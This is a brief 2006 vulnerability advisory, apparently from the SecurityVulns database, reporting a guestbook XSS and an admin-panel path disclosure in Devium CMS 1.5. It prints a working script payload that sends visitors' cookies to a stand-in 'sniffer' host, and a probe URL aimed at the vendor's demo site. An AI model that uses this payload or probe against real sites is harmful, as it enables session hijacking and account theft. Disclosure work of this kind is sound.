XSS в Devium CMS 1.5

2006-07-25T00:00:00
ID SECURITYVULNS:DOC:13611
Type securityvulns
Reporter Securityvulns
Modified 2006-07-25T00:00:00

Description

Advisory: XSS в Devium CMS 1.5

Home Page: http://www.devium.net/

Уязвимость/Vulnerability: XSS в гостевой книге.

Exploit: <script>img = new Image(); img.src = "http://sniffer/a.jpg?"+document.cookie;</script>

Уязвимость/Vulnerability: Раскрытие установочного пути в админке:

http://demo.devium.net/admin/index.php?mod=links'

Copyright © Cyber Lords Community www.cyberlords.net